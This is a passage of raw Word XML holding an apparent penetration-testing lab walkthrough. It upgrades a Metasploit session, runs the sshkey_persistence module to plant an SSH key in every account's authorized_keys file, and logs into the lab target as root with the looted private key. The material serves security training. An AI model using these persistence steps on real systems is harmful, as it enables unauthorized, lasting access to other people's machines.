      <w:r w:rsidRPr="007F0989">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> session by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7783D338" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174B0ED9" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>sessions -u 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358545EB" w14:textId="1A3B21E3" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="000A1634" w:rsidP="007F0989">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="698FBC22" wp14:editId="5F764099">
            <wp:extent cx="5905804" cy="1701887"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="161933026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30266" name="Picture 1619330266"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5905804" cy="1701887"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D80CDB" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>Now that we have been able to elevate our privileges on the target system, we can begin exploring the process of establishing persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F720825" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">The best Metasploit module that can be used to establish persistent access on a Linux target is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>sshkey_persistence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AF646F" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>We can load the module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ACCCDD" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C329E" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>use post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>sshkey_persistence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F6ECCA8" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>We will now need to configure the module options, more specifically, we will need to set the SESSION ID and CREATESSHFOLDER options. This can be done by running the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AE5393" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C902B3" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>set SESSION 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64794DC3" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>Note: In your case, the SESSION ID will be different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA92FA6" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2195A5CF" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>set CREATESSHFOLDER true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0506BA03" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>After configuring the module options, we can execute the module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1AC753" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145DAAE0" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68710041" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">As shown in the following screenshot, the module runs successfully and will add a public SSH key to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> file in the home directory of all user and service accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5223B63F" w14:textId="12F13CDF" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989"/>
    <w:p w14:paraId="3F1379A9" w14:textId="6C415F5D" w:rsidR="007F0989" w:rsidRDefault="000A1634" w:rsidP="007F0989">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22F47337" wp14:editId="47439BEE">
            <wp:extent cx="5772447" cy="4343623"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3597419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41947" name="Picture 359741947"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5772447" cy="4343623"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C520C3" w14:textId="31AB7A44" w:rsidR="000A1634" w:rsidRPr="007F0989" w:rsidRDefault="000A1634" w:rsidP="007F0989">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A7E5248" wp14:editId="1B7AAF6F">
            <wp:extent cx="5893103" cy="2870348"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="290552240" name="Picture 3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52240" name="Picture 32" descr="A computer screen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893103" cy="2870348"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="692F1C03" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH Private Key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D1D07" w14:textId="77777777" w:rsidR="000A1634" w:rsidRDefault="000A1634" w:rsidP="007F0989">
      <w:r w:rsidRPr="000A1634">
        <w:t>/root/.msf4/loot/20251022104235_default_192.155.231.3_id_rsa_562729.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0C650F" w14:textId="45B8D982" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:lastRenderedPageBreak/>
        <w:t>To use the private key, copy the key and save it as a new file, in this case, we will be saving it in the home directory of the root user on the Kali Linux system as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ssh_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8DC5F2" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF920E" w14:textId="12A0F797" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">cp </w:t>
      </w:r>
      <w:r w:rsidR="000A1634" w:rsidRPr="000A1634">
        <w:t>/root/.msf4/loot/20251022104235_default_192.155.231.3_id_rsa_562729.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>ssh_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62C30551" w14:textId="5A2ACC98" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="000A1634" w:rsidP="007F0989">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36F7D76F" wp14:editId="5EEEAA2A">
            <wp:extent cx="5397777" cy="4521432"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12852629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62985" name="Picture 1285262985"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5397777" cy="4521432"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAFD348" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">We will then need to assign the appropriate permissions to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>file,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> this can be done by running the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A496FB5" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4F6B04" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> 0400 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>ssh_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67C94062" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>We can now authenticate with the target using the private key via SSH by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB7D7D4" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDFACE4" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t>ssh -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>ssh_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>root@demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68F88E9A" w14:textId="12504BB2" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="000A1634" w:rsidP="007F0989">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D74B46C" wp14:editId="65DC8D16">
            <wp:extent cx="5543835" cy="4178515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61119917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99171" name="Picture 611199171"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5543835" cy="4178515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="228399BE" w14:textId="77777777" w:rsidR="007F0989" w:rsidRPr="007F0989" w:rsidRDefault="007F0989" w:rsidP="007F0989">
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve">As shown in the following screenshot, the authentication with the private key is successful and we have successfully been able to establish persistent access to the Linux target by adding our public key to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F0989">
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F0989">
        <w:t xml:space="preserve"> file of over user account, consequently allowing us to authenticate with the target via SSH without providing a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221B3262" w14:textId="77777777" w:rsidR="007F0989" w:rsidRDefault="007F0989"/>
    <w:sectPr w:rsidR="007F09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7C3"/>
    <w:rsid w:val="000435ED"/>
    <w:rsid w:val="000A1634"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005D37C3"/>
    <w:rsid w:val="007F0989"/>
    <w:rsid w:val="00824D60"/>
    <w:rsid w:val="00853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35246"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A30AE316-57F4-4B6D-BC29-D68C1FC92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7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37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37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7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7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7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37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7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7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7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7C3"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="005D3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7C3"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="005D37C3"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005D37C3"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="005D37C3"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="005D3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7C3"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="005D37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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.tmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.tmp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.tmp"/><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image" Target="media/image8.tmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.tmp"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.tmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.tmp"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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750</Words>
  <Characters>4046</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>126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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-22T04:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-22T05:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>